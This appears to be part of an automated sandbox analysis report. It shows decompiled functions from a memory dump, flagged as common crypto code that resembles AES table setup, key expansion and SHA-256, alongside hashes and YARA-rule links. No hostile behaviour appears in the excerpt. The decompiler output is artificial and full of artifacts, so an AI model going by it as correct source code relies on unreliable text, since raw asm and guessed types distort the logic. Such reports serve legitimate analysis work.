                            • Instruction ID: ee835b5742deb9b12e10404a3cba44a817614547d85d2b30e02f3ceed89343a5
                            • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                            • Instruction Fuzzy Hash: 70515873600A4C57DF385728F5967BF67DDAB16700F180E1AE942CB2C2C615EF458356
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009EDADD, Relevance: .2, Instructions: 190COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 97%
                            			E009EDADD() {
				intOrPtr _v8;
				char _v521;
				char _t140;
				signed int _t154;
				signed int _t155;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t179;
				signed int _t181;
				signed char _t192;
				signed int _t199;
				signed int _t207;
				void* _t208;
				signed int _t209;
				signed char _t211;
				signed int _t219;
				void* _t220;

				_t140 = 0;
				_t179 = 1;
				_t207 = 1;
				do {
					 *(_t220 + _t140 - 0x304) = _t207;
					 *(_t220 + _t140 - 0x205) = _t207;
					 *((char*)(_t220 + _t207 - 0x104)) = _t140;
					_v8 = _t140 + 1;
					asm("sbb ecx, ecx");
					_t140 = _v8;
					_t207 = _t207 ^  ~(_t207 & 0x80) & 0x0000011b ^ _t207 + _t207;
				} while (_t207 != 1);
				_t208 = 0;
				do {
					 *(_t208 + 0xa24330) = _t179;
					asm("sbb ecx, ecx");
					_t179 = _t179 + _t179 ^  ~(_t179 & 0x80) & 0x0000011b;
					_t208 = _t208 + 1;
				} while (_t208 < 0x1e);
				_t181 = 0;
				do {
					if(_t181 == 0) {
						_t209 = 0;
					} else {
						_t209 =  *( &_v521 - ( *(_t220 + (_t181 & 0x000000ff) - 0x104) & 0x000000ff)) & 0x000000ff;
					}
					_t192 = (_t209 ^ (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) + (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) ^ 0x00006300) >> 0x00000008 ^ _t209 ^ (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) + (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209);
					 *(_t181 + 0xa24130) = _t192;
					 *(0xa24f51 + _t181 * 4) = _t192;
					 *(0xa24f50 + _t181 * 4) = _t192;
					 *(0xa24b53 + _t181 * 4) = _t192;
					 *(0xa24b50 + _t181 * 4) = _t192;
					 *(0xa24753 + _t181 * 4) = _t192;
					 *(0xa24752 + _t181 * 4) = _t192;
					 *(0xa24352 + _t181 * 4) = _t192;
					 *(0xa24351 + _t181 * 4) = _t192;
					if(_t192 == 0) {
						_t154 = 0;
					} else {
						_t154 =  *(_t220 + ( *(_t220 + (_t192 & 0x000000ff) - 0x104) & 0x000000ff) - 0x2eb) & 0x000000ff;
					}
					 *(0xa24f53 + _t181 * 4) = _t154;
					 *(0xa24b52 + _t181 * 4) = _t154;
					 *(0xa24751 + _t181 * 4) = _t154;
					 *(0xa24350 + _t181 * 4) = _t154;
					if(_t192 == 0) {
						_t155 = 0;
					} else {
						_t155 =  *(_t220 + ( *(_t220 + (_t192 & 0x000000ff) - 0x104) & 0x000000ff) - 0x303) & 0x000000ff;
					}
					_t219 = _t181 & 0x000000ff;
					 *(0xa24f52 + _t181 * 4) = _t155;
					 *(0xa24b51 + _t181 * 4) = _t155;
					 *(0xa24750 + _t181 * 4) = _t155;
					 *(0xa24353 + _t181 * 4) = _t155;
					if((((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) >> 0x00000008 ^ ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219)) == 5) {
						_t211 = 0;
					} else {
						_t211 =  *((intOrPtr*)( &_v521 - ( *(_t220 + (((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) >> 0x00000008 & 0x000000ff ^ ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) & 0x000000ff ^ 0x00000005) - 0x104) & 0x000000ff)));
					}
					 *(_t181 + 0xa24230) = _t211;
					if(_t211 == 0) {
						_t159 = 0;
					} else {
						_t159 =  *(_t220 + ( *(_t220 + (_t211 & 0x000000ff) - 0x104) & 0x000000ff) - 0x29c) & 0x000000ff;
					}
					_t199 = _t211 & 0x000000ff;
					 *(0xa25f52 + _t181 * 4) = _t159;
					 *(0xa25b51 + _t181 * 4) = _t159;
					 *(0xa25750 + _t181 * 4) = _t159;
					 *(0xa25353 + _t181 * 4) = _t159;
					 *(0xa26f52 + _t199 * 4) = _t159;
					 *(0xa26b51 + _t199 * 4) = _t159;
					 *(0xa26750 + _t199 * 4) = _t159;
					 *(0xa26353 + _t199 * 4) = _t159;
					if(_t211 == 0) {
						_t160 = 0;
					} else {
						_t160 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x23d) & 0x000000ff;
					}
					 *(0xa25f50 + _t181 * 4) = _t160;
					 *(0xa25b53 + _t181 * 4) = _t160;
					 *(0xa25752 + _t181 * 4) = _t160;
					 *(0xa25351 + _t181 * 4) = _t160;
					 *(0xa26f50 + _t199 * 4) = _t160;
					 *(0xa26b53 + _t199 * 4) = _t160;
					 *(0xa26752 + _t199 * 4) = _t160;
					 *(0xa26351 + _t199 * 4) = _t160;
					if(_t211 == 0) {
						_t161 = 0;
					} else {
						_t161 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x216) & 0x000000ff;
					}
					 *(0xa25f51 + _t181 * 4) = _t161;
					 *(0xa25b50 + _t181 * 4) = _t161;
					 *(0xa25753 + _t181 * 4) = _t161;
					 *(0xa25352 + _t181 * 4) = _t161;
					 *(0xa26f51 + _t199 * 4) = _t161;
					 *(0xa26b50 + _t199 * 4) = _t161;
					 *(0xa26753 + _t199 * 4) = _t161;
					 *(0xa26352 + _t199 * 4) = _t161;
					if(_t211 == 0) {
						_t162 = 0;
					} else {
						_t162 =  *(_t220 + ( *(_t220 + _t199 - 0x104) & 0x000000ff) - 0x225) & 0x000000ff;
					}
					 *(0xa25f53 + _t181 * 4) = _t162;
					 *(0xa25b52 + _t181 * 4) = _t162;
					 *(0xa25751 + _t181 * 4) = _t162;
					 *(0xa25350 + _t181 * 4) = _t162;
					_t181 = _t181 + 1;
					 *(0xa26f53 + _t199 * 4) = _t162;
					 *(0xa26b52 + _t199 * 4) = _t162;
					 *(0xa26751 + _t199 * 4) = _t162;
					 *(0xa26350 + _t199 * 4) = _t162;
				} while (_t181 < 0x100);
				return _t162;
			}






















                            0x009edae6
                            0x009edaeb
                            0x009edaed
                            0x009edaf4
                            0x009edaf4
                            0x009edafb
                            0x009edb02
                            0x009edb0a
                            0x009edb19
                            0x009edb1f
                            0x009edb22
                            0x009edb24
                            0x009edb28
                            0x009edb2a
                            0x009edb2c
                            0x009edb39
                            0x009edb3f
                            0x009edb41
                            0x009edb42
                            0x009edb47
                            0x009edb49
                            0x009edb4b
                            0x009edb65
                            0x009edb4d
                            0x009edb60
                            0x009edb60
                            0x009edb83
                            0x009edb85
                            0x009edb8b
                            0x009edb92
                            0x009edb99
                            0x009edba0
                            0x009edba7
                            0x009edbae
                            0x009edbb5
                            0x009edbbc
                            0x009edbc5
                            0x009edbdc
                            0x009edbc7
                            0x009edbd2
                            0x009edbd2
                            0x009edbde
                            0x009edbe5
                            0x009edbec
                            0x009edbf3
                            0x009edbfc
                            0x009edc13
                            0x009edbfe
                            0x009edc09
                            0x009edc09
                            0x009edc15
                            0x009edc1a
                            0x009edc26
                            0x009edc32
                            0x009edc3b
                            0x009edc4b
                            0x009edc7f
                            0x009edc4d
                            0x009edc7b
                            0x009edc7b
                            0x009edc81
                            0x009edc89
                            0x009edca0
                            0x009edc8b
                            0x009edc96
                            0x009edc96
                            0x009edca2
                            0x009edca5
                            0x009edcac
                            0x009edcb3
                            0x009edcba
                            0x009edcc1
                            0x009edcc8
                            0x009edccf
                            0x009edcd6
                            0x009edcdf
                            0x009edcf3
                            0x009edce1
                            0x009edce9
                            0x009edce9
                            0x009edcf5
                            0x009edcfc
                            0x009edd03
                            0x009edd0a
                            0x009edd11
                            0x009edd18
                            0x009edd1f
                            0x009edd26
                            0x009edd2f
                            0x009edd43
                            0x009edd31
                            0x009edd39
                            0x009edd39
                            0x009edd45
                            0x009edd4c
                            0x009edd53
                            0x009edd5a
                            0x009edd61
                            0x009edd68
                            0x009edd6f
                            0x009edd76
                            0x009edd7f
                            0x009edd93
                            0x009edd81
                            0x009edd89
                            0x009edd89
                            0x009edd95
                            0x009edd9c
                            0x009edda3
                            0x009eddaa
                            0x009eddb1
                            0x009eddb2
                            0x009eddb9
                            0x009eddc0
                            0x009eddc7
                            0x009eddce
                            0x009edddf

                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2ab2eb6b5e93ae52aceac3bf8110107f999752700fd2c2da7fa0991e6b7ad436
                            • Instruction ID: dffd0a44cdef7416f2b772bbe6bf2bad9b7ba0b69049e3c82b514abd34d10f09
                            • Opcode Fuzzy Hash: 2ab2eb6b5e93ae52aceac3bf8110107f999752700fd2c2da7fa0991e6b7ad436
                            • Instruction Fuzzy Hash: C181DD9251A2D09DC726CFBD38E42F53FA16777341B1C44BAC8D58B2A3D0768A9BC721
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009EE510, Relevance: .2, Instructions: 154COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009EE510(intOrPtr __ecx, signed char _a4) {
				char _v12;
				signed int _v13;
				signed int _v14;
				signed int _v15;
				signed int _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				char _v28;
				signed int _v29;
				signed int _v30;
				signed int _v31;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed char _t96;
				signed int _t117;
				signed int* _t121;
				signed int* _t122;
				void* _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				void* _t129;
				void* _t130;
				signed int _t131;
				char* _t132;
				void* _t133;
				signed int _t135;
				intOrPtr _t137;
				signed char* _t139;
				void* _t141;
				void* _t161;
				void* _t164;

				_t137 = __ecx;
				_t135 = _a4 - 6;
				_v40 = __ecx;
				_v36 = _t135;
				_t96 = E009FEA80( &_v32, _a4, 0x20);
				_t141 =  &_v40 + 0xc;
				_t117 = 0;
				_t133 = 0;
				_t126 = 0;
				if(_t135 <= 0) {
					L10:
					if(_t117 <= _a4) {
						_t127 = 0xa24330;
						do {
							_v32 = _v32 ^  *(( *(_t141 + 0x15 + _t135 * 4) & 0x000000ff) + 0xa24130);
							_v31 = _v31 ^  *(( *(_t141 + 0x16 + _t135 * 4) & 0x000000ff) + 0xa24130);
							_v30 = _v30 ^  *(( *(_t141 + 0x17 + _t135 * 4) & 0x000000ff) + 0xa24130);
							_v29 = _v29 ^  *(( *(_t141 + 0x14 + _t135 * 4) & 0x000000ff) + 0xa24130);
							_t96 =  *_t127;
							_v32 = _v32 ^ _t96;
							_v36 = _t127 + 1;
							if(_t135 == 8) {
								_t121 =  &_v28;
								_a4 = 3;
								do {
									_t129 = 4;
									do {
										 *_t121 =  *_t121 ^  *(_t121 - 4);
										_t121 =  &(_t121[0]);
										_t129 = _t129 - 1;
									} while (_t129 != 0);
									_t58 =  &_a4;
									 *_t58 = _a4 - 1;
								} while ( *_t58 != 0);
								_t122 =  &_v12;
								_a4 = 3;
								_v16 = _v16 ^  *((_v20 & 0x000000ff) + 0xa24130);
								_v15 = _v15 ^  *((_v19 & 0x000000ff) + 0xa24130);
								_v14 = _v14 ^  *((_v18 & 0x000000ff) + 0xa24130);
								_v13 = _v13 ^  *((_v17 & 0x000000ff) + 0xa24130);
								do {
									_t130 = 4;
									do {
										_t96 =  *((intOrPtr*)(_t122 - 4));
										 *_t122 =  *_t122 ^ _t96;
										_t122 =  &(_t122[0]);
										_t130 = _t130 - 1;
									} while (_t130 != 0);
									_t79 =  &_a4;
									 *_t79 = _a4 - 1;
								} while ( *_t79 != 0);
							} else {
								if(_t135 > 1) {
									_t132 =  &_v28;
									_a4 = _t135 - 1;
									do {
										_t124 = 0;
										do {
											_t96 =  *((intOrPtr*)(_t132 + _t124 - 4));
											 *(_t132 + _t124) =  *(_t132 + _t124) ^ _t96;
											_t124 = _t124 + 1;
										} while (_t124 < 4);
										_t132 = _t132 + 4;
										_t53 =  &_a4;
										 *_t53 = _a4 - 1;
									} while ( *_t53 != 0);
								}
							}
							_t131 = 0;
							if(_t135 <= 0) {
								L37:
								_t164 = _t117 - _a4;
							} else {
								while(_t117 <= _a4) {
									if(_t131 >= _t135) {
										L33:
										_t161 = _t133 - 4;
									} else {
										_t96 =  &(( &_v32)[_t131]);
										_a4 = _t96;
										while(_t133 < 4) {
											 *((intOrPtr*)(_t137 + 0x18 + (_t133 + _t117 * 4) * 4)) =  *_t96;
											_t131 = _t131 + 1;
											_t96 = _a4 + 4;
											_t133 = _t133 + 1;
											_a4 = _t96;
											if(_t131 < _t135) {
												continue;
											} else {
												goto L33;
											}
											goto L34;
										}
									}
									L34:
									if(_t161 == 0) {
										_t117 = _t117 + 1;
										_t133 = 0;
									}
									if(_t131 < _t135) {
										continue;
									} else {
										goto L37;
									}
									goto L38;
								}
							}
							L38:
							_t127 = _v36;
						} while (_t164 <= 0);
					}
				} else {
					while(_t117 <= _a4) {
						if(_t126 < _t135) {
							_t139 =  &(( &_v32)[_t126]);
							while(_t133 < 4) {
								_t125 = _t133 + _t117 * 4;
								_t96 =  *_t139;
								_t126 = _t126 + 1;
								_t139 =  &_a4;
								_t133 = _t133 + 1;
								 *(_v40 + 0x18 + _t125 * 4) = _t96;
								_t135 = _v36;
								if(_t126 < _t135) {
									continue;
								}
								break;
							}
							_t137 = _v40;
						}
						if(_t133 == 4) {
							_t117 = _t117 + 1;
							_t133 = 0;
						}
						if(_t126 < _t135) {
							continue;
						} else {
							goto L10;
						}
						goto L39;
					}
				}
				L39:
				return _t96;
			}






































                            0x009ee516
                            0x009ee526
                            0x009ee529
                            0x009ee52e
                            0x009ee532
                            0x009ee537
                            0x009ee53a
                            0x009ee53c
                            0x009ee53e
                            0x009ee542
                            0x009ee589
                            0x009ee58c
                            0x009ee592
                            0x009ee597
                            0x009ee5a6
                            0x009ee5b5
                            0x009ee5c4
                            0x009ee5d3
                            0x009ee5d7
                            0x009ee5d9
                            0x009ee5de
                            0x009ee5e5
                            0x009ee616
                            0x009ee61a
                            0x009ee622
                            0x009ee624
                            0x009ee625
                            0x009ee628
                            0x009ee62a
                            0x009ee62b
                            0x009ee62b
                            0x009ee630
                            0x009ee630
                            0x009ee630
                            0x009ee63c
                            0x009ee640
                            0x009ee64e
                            0x009ee65d
                            0x009ee66c
                            0x009ee67b
                            0x009ee67f
                            0x009ee681
                            0x009ee682
                            0x009ee682
                            0x009ee685
                            0x009ee687
                            0x009ee688
                            0x009ee688
                            0x009ee68d
                            0x009ee68d
                            0x009ee68d
                            0x009ee5e7
                            0x009ee5ea
                            0x009ee5f3
                            0x009ee5f7
                            0x009ee5fb
                            0x009ee5fb
                            0x009ee5fd
                            0x009ee5fd
                            0x009ee601
                            0x009ee604
                            0x009ee605
                            0x009ee60a
                            0x009ee60d
                            0x009ee60d
                            0x009ee60d
                            0x009ee614
                            0x009ee5ea
                            0x009ee694
                            0x009ee698
                            0x009ee6d9
                            0x009ee6d9
                            0x00000000
                            0x009ee69a
                            0x009ee6a1
                            0x009ee6cd
                            0x009ee6cd
                            0x009ee6a3
                            0x009ee6a7
                            0x009ee6aa
                            0x009ee6ae
                            0x009ee6b8
                            0x009ee6bc
                            0x009ee6c1
                            0x009ee6c4
                            0x009ee6c5
                            0x009ee6cb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ee6cb
                            0x009ee6ae
                            0x009ee6d0
                            0x009ee6d0
                            0x009ee6d2
                            0x009ee6d3
                            0x009ee6d3
                            0x009ee6d7
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ee6d7
                            0x009ee69a
                            0x009ee6dc
                            0x009ee6dc
                            0x009ee6dc
                            0x009ee597
                            0x00000000
                            0x009ee544
                            0x009ee54f
                            0x009ee555
                            0x009ee559
                            0x009ee562
                            0x009ee565
                            0x009ee568
                            0x009ee569
                            0x009ee56c
                            0x009ee56d
                            0x009ee571
                            0x009ee577
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ee577
                            0x009ee579
                            0x009ee579
                            0x009ee580
                            0x009ee582
                            0x009ee583
                            0x009ee583
                            0x009ee587
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009ee587
                            0x009ee544
                            0x009ee6ed
                            0x009ee6ed

                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 164ec825e9e62879c98f19c75f61c602eae2bc90effc14fa61cf24eef6fde956
                            • Instruction ID: 9f853bafa7968edb4ef68e542807ddc0a8795513cddd20ec39c18553c85f9d9d
                            • Opcode Fuzzy Hash: 164ec825e9e62879c98f19c75f61c602eae2bc90effc14fa61cf24eef6fde956
                            • Instruction Fuzzy Hash: 5C51B3309083D54EC713CF2A918056EBFE1AEEA718F4948AEF4D54B216D231DA49CF52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009EF5C5, Relevance: .1, Instructions: 131COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 80%
                            			E009EF5C5() {
				signed int _t85;
				signed int* _t86;
				unsigned int* _t87;
				void* _t88;
				unsigned int _t90;
				unsigned int _t113;
				signed int _t115;
				signed int* _t120;
				signed int _t121;
				signed int* _t122;
				signed int _t123;
				void* _t135;
				void* _t136;
				void* _t137;
				signed int _t138;
				void* _t140;

				_t120 =  *(_t140 + 0x130);
				_t123 = 0;
				_t86 =  &(_t120[0xa]);
				do {
					 *((intOrPtr*)(_t140 + 0x30 + _t123 * 4)) = E00A05604( *_t86);
					_t86 =  &(_t86[1]);
					_t123 = _t123 + 1;
				} while (_t123 < 0x10);
				_t87 = _t140 + 0x68;
				_t137 = 0x30;
				do {
					_t90 =  *(_t87 - 0x34);
					_t113 =  *_t87;
					asm("rol esi, 0xe");
					_t87 =  &(_t87[1]);
					asm("ror eax, 0x7");
					asm("rol eax, 0xd");
					asm("rol ecx, 0xf");
					_t87[1] = (_t90 ^ _t90 ^ _t90 >> 0x00000003) + (_t113 ^ _t113 ^ _t113 >> 0x0000000a) +  *((intOrPtr*)(_t87 - 0x3c)) +  *((intOrPtr*)(_t87 - 0x18));
					_t137 = _t137 - 1;
				} while (_t137 != 0);
				_t88 = 0;
				_t138 = _t120[4];
				_t115 = _t120[5];
				 *(_t140 + 0x10) = _t120[1];
				 *(_t140 + 0x20) = _t120[3];
				 *(_t140 + 0x1c) =  *_t120;
				 *(_t140 + 0x18) = _t120[6];
				_t121 =  *(_t140 + 0x1c);
				 *(_t140 + 0x14) = _t120[2];
				 *(_t140 + 0x24) = _t120[7];
				while(1) {
					 *(_t140 + 0x28) = _t138;
					asm("ror esi, 0xb");
					asm("rol eax, 0x7");
					asm("ror eax, 0x6");
					 *(_t140 + 0x18) = _t115;
					_t33 = _t88 + 0xa12780; // 0x0
					_t135 = (_t138 ^ _t138 ^ _t138) + ( !_t138 &  *(_t140 + 0x18) ^ _t115 & _t138) +  *_t33 +  *((intOrPtr*)(_t140 + _t88 + 0x2c));
					_t88 = _t88 + 4;
					_t136 = _t135 +  *(_t140 + 0x24);
					 *(_t140 + 0x24) =  *(_t140 + 0x18);
					_t138 =  *(_t140 + 0x20) + _t136;
					asm("ror edx, 0xd");
					asm("rol eax, 0xa");
					asm("ror eax, 0x2");
					_t85 =  *(_t140 + 0x10);
					 *(_t140 + 0x10) = _t121;
					 *(_t140 + 0x20) =  *(_t140 + 0x14);
					 *(_t140 + 0x14) = _t85;
					_t121 = (_t121 ^ _t121 ^ _t121) + (( *(_t140 + 0x14) ^  *(_t140 + 0x10)) & _t121 ^  *(_t140 + 0x14) &  *(_t140 + 0x10)) + _t136;
					if(_t88 >= 0x100) {
						break;
					}
					_t115 =  *(_t140 + 0x28);
				}
				 *(_t140 + 0x1c) = _t121;
				_t122 =  *(_t140 + 0x130);
				 *_t122 =  *_t122 +  *(_t140 + 0x1c);
				_t122[1] = _t122[1] +  *(_t140 + 0x10);
				_t122[2] = _t122[2] + _t85;
				_t122[3] = _t122[3] +  *(_t140 + 0x20);
				_t122[5] = _t122[5] +  *(_t140 + 0x28);
				_t122[6] = _t122[6] +  *(_t140 + 0x18);
				_t122[4] = _t122[4] + _t138;
				_t122[7] = _t122[7] +  *(_t140 + 0x24);
				return _t85;
			}



















                            0x009ef5cf
                            0x009ef5d6
                            0x009ef5d8
                            0x009ef5db
                            0x009ef5e2
                            0x009ef5e6
                            0x009ef5e9
                            0x009ef5eb
                            0x009ef5f2
                            0x009ef5f6
                            0x009ef5f7
                            0x009ef5f7
                            0x009ef5fc
                            0x009ef600
                            0x009ef603
                            0x009ef606
                            0x009ef614
                            0x009ef617
                            0x009ef629
                            0x009ef62c
                            0x009ef62c
                            0x009ef634
                            0x009ef638
                            0x009ef63b
                            0x009ef63e
                            0x009ef645
                            0x009ef64c
                            0x009ef653
                            0x009ef65a
                            0x009ef65e
                            0x009ef662
                            0x009ef66c
                            0x009ef66e
                            0x009ef672
                            0x009ef677
                            0x009ef686
                            0x009ef69b
                            0x009ef69f
                            0x009ef6a7
                            0x009ef6ab
                            0x009ef6ae
                            0x009ef6b2
                            0x009ef6b6
                            0x009ef6b8
                            0x009ef6bd
                            0x009ef6c4
                            0x009ef6db
                            0x009ef6e1
                            0x009ef6e9
                            0x009ef6ed
                            0x009ef6f1
                            0x009ef6fa
                            0x00000000
                            0x00000000
                            0x009ef668
                            0x009ef668
                            0x009ef700
                            0x009ef704
                            0x009ef70f
                            0x009ef715
                            0x009ef71a
                            0x009ef721
                            0x009ef728
                            0x009ef72f
                            0x009ef732
                            0x009ef739
                            0x009ef746

                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 474fd9ea863b5416c3aca8ec94f57037e31dc549396da1aee698da0e6062652f
                            • Instruction ID: 59a62c30543e9b03ce7d786d71dce6198c5d131c9d22eb2f6398227e530f81f4
                            • Opcode Fuzzy Hash: 474fd9ea863b5416c3aca8ec94f57037e31dc549396da1aee698da0e6062652f
                            • Instruction Fuzzy Hash: A65146B1A087028FC748CF19D49059AF7E1FF88314F054A2EE889A7740DB34EA58CB96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F33D3, Relevance: .1, Instructions: 112COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009F33D3(unsigned int __ecx) {
				intOrPtr _t39;
				signed int _t47;
				intOrPtr _t48;
				signed int _t55;
				signed int _t61;
				signed int _t66;
				intOrPtr _t78;
				signed int _t82;
				unsigned char _t84;
				signed int* _t86;
				intOrPtr _t87;
				unsigned int _t88;
				unsigned int _t89;
				signed int _t90;
				void* _t91;

				_t88 =  *(_t91 + 0x1c);
				_t61 = 0;
				_t86 =  *(_t91 + 0x24);
				_t89 = __ecx;
				 *(_t91 + 0x14) = __ecx;
				_t86[3] = 0;
				if( *((intOrPtr*)(_t88 + 8)) != 0 ||  *_t88 <=  *((intOrPtr*)(__ecx + 0x84)) - 7 || E009F4422(__ecx) != 0) {
					E009EA4D1(_t88,  ~( *(_t88 + 4)) & 0x00000007);
					 *(_t91 + 0x14) = E009EA4E8(_t88) >> 8;
					E009EA4D1(_t88, 8);
					_t66 =  *(_t91 + 0x10) & 0x000000ff;
					_t39 = (_t66 >> 0x00000003 & 0x00000003) + 1;
					 *((intOrPtr*)(_t91 + 0x20)) = _t39;
					if(_t39 == 4) {
						goto L3;
					}
					_t86[3] = _t39 + 2;
					_t86[1] = (_t66 & 0x00000007) + 1;
					 *(_t91 + 0x1c) = E009EA4E8(_t88) >> 8;
					E009EA4D1(_t88, 8);
					if( *((intOrPtr*)(_t91 + 0x20)) <= _t61) {
						L9:
						_t84 =  *(_t91 + 0x10);
						 *_t86 = _t61;
						if((_t61 >> 0x00000010 ^ _t61 >> 0x00000008 ^ _t61 ^ _t84 ^ 0x0000005a) !=  *((intOrPtr*)(_t91 + 0x18))) {
							goto L3;
						}
						_t47 =  *_t88;
						_t86[2] = _t47;
						_t23 = _t47 - 1; // -1
						_t48 =  *((intOrPtr*)(_t89 + 0x88));
						_t78 = _t23 + _t61;
						if(_t48 >= _t78) {
							_t48 = _t78;
						}
						 *((intOrPtr*)(_t89 + 0x88)) = _t48;
						_t86[4] = _t84 >> 0x00000006 & 0x00000001;
						_t86[4] = _t84 >> 7;
						return 1;
					}
					_t87 =  *((intOrPtr*)(_t91 + 0x20));
					_t90 = _t61;
					do {
						_t55 = E009EA4E8(_t88) >> 8 << _t90;
						_t90 = _t90 + 8;
						_t61 = _t61 + _t55;
						_t82 =  *(_t88 + 4) + 8;
						 *_t88 =  *_t88 + (_t82 >> 3);
						 *(_t88 + 4) = _t82 & 0x00000007;
						_t87 = _t87 - 1;
					} while (_t87 != 0);
					_t86 =  *(_t91 + 0x24);
					_t89 =  *(_t91 + 0x14);
					goto L9;
				} else {
					L3:
					return 0;
				}
			}


















                            0x009f33d9
                            0x009f33dd
                            0x009f33e0
                            0x009f33e4
                            0x009f33e6
                            0x009f33ea
                            0x009f33f0
                            0x009f341a
                            0x009f342d
                            0x009f3431
                            0x009f343a
                            0x009f3445
                            0x009f3446
                            0x009f344d
                            0x00000000
                            0x00000000
                            0x009f3456
                            0x009f3459
                            0x009f346a
                            0x009f346e
                            0x009f3477
                            0x009f34b2
                            0x009f34b2
                            0x009f34c2
                            0x009f34cf
                            0x00000000
                            0x00000000
                            0x009f34d5
                            0x009f34d7
                            0x009f34da
                            0x009f34dd
                            0x009f34e3
                            0x009f34e7
                            0x009f34e9
                            0x009f34e9
                            0x009f34eb
                            0x009f34fb
                            0x009f3500
                            0x00000000
                            0x009f3500
                            0x009f3479
                            0x009f347d
                            0x009f347f
                            0x009f348b
                            0x009f348d
                            0x009f3493
                            0x009f3495
                            0x009f34a0
                            0x009f34a2
                            0x009f34a5
                            0x009f34a5
                            0x009f34aa
                            0x009f34ae
                            0x00000000
                            0x009f3408
                            0x009f3408
                            0x00000000
                            0x009f3408

                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
